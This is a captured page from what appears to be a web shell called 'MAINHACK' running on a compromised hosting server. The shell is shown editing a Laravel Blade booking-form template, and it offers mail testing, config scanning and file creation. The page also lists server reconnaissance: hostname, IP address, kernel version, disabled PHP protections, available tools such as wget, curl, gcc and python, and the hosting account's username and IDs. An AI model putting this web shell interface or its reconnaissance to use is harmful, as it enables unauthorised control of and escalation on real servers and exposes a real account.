[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: create.blade.php
<div class="modal fade" id="add_booking_modal" tabindex="-1" role="dialog" aria-labelledby="gridSystemModalLabel"> <div class="modal-dialog" role="document"> <div class="modal-content"> {!! Form::open(['url' => action([\App\Http\Controllers\Restaurant\BookingController::class, 'store']), 'method' => 'post', 'id' => 'add_booking_form' ]) !!} <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> <h4 class="modal-title">@lang( 'restaurant.add_booking' )</h4> </div> <div class="modal-body"> @if(count($business_locations) == 1) @php $default_location = current(array_keys($business_locations->toArray())) @endphp @else @php $default_location = null; @endphp @endif <div class="row"> <div class="col-sm-12"> <div class="form-group"> <div class="input-group"> <span class="input-group-addon"> <i class="fa fa-map-marker"></i> </span> {!! Form::select('location_id', $business_locations, $default_location, ['class' => 'form-control', 'placeholder' => __('purchase.business_location'), 'required', 'id' => 'booking_location_id']); !!} </div> </div> </div> <div class="clearfix"></div> <div class="col-sm-6"> <div class="form-group"> <div class="input-group"> <span class="input-group-addon"> <i class="fa fa-user"></i> </span> {!! Form::select('contact_id', $customers, null, ['class' => 'form-control', 'id' => 'booking_customer_id', 'placeholder' => __('contact.customer'), 'required']); !!} <span class="input-group-btn"> <button type="button" class="btn btn-default bg-white btn-flat add_new_customer" data-name="" @if(!auth()->user()->can('customer.create')) disabled @endif><i class="fa fa-plus-circle text-primary fa-lg"></i></button> </span> </div> </div> </div> <div class="col-sm-6"> <div class="form-group"> <div class="input-group"> <span class="input-group-addon"> <i class="fa fa-user"></i> </span> {!! Form::select('correspondent', $correspondents, null, ['class' => 'form-control', 'placeholder' => __('restaurant.select_correspondent'), 'id' => 'correspondent']); !!} </div> </div> </div> <div class="clearfix"></div> <div id="restaurant_module_span"></div> <div class="clearfix"></div> <div class="col-sm-6"> <div class="form-group"> {!! Form::label('status', __('restaurant.start_time') . ':*') !!} <div class='input-group date' > <span class="input-group-addon"> <span class="glyphicon glyphicon-calendar"></span> </span> {!! Form::text('booking_start', null, ['class' => 'form-control','placeholder' => __( 'restaurant.start_time' ), 'required', 'id' => 'start_time', 'readonly']); !!} </div> </div> </div> <div class="col-sm-6"> <div class="form-group"> {!! Form::label('status', __('restaurant.end_time') . ':*') !!} <div class='input-group date' > <span class="input-group-addon"> <span class="glyphicon glyphicon-calendar"></span> </span> {!! Form::text('booking_end', null, ['class' => 'form-control','placeholder' => __( 'restaurant.end_time' ), 'required', 'id' => 'end_time', 'readonly']); !!} </div> </div> </div> <div class="col-sm-12"> <div class="form-group"> {!! Form::label('booking_note', __( 'restaurant.customer_note' ) . ':') !!} {!! Form::textarea('booking_note', null, ['class' => 'form-control','placeholder' => __( 'restaurant.customer_note' ), 'rows' => 3 ]); !!} </div> </div> <div class="col-sm-12"> <div class="form-group"> <div class="checkbox"> {!! Form::checkbox('send_notification', 1, true, ['class' => 'input-icheck', 'id' => 'send_notification']); !!} @lang('restaurant.send_notification_to_customer') </div> </div> </div> </div> <div class="modal-footer"> <button type="submit" class="tw-dw-btn tw-dw-btn-primary tw-text-white">@lang( 'messages.save' )</button> <button type="button" class="tw-dw-btn tw-dw-btn-neutral tw-text-white" data-dismiss="modal">@lang( 'messages.close' )</button> </div> {!! Form::close() !!} </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285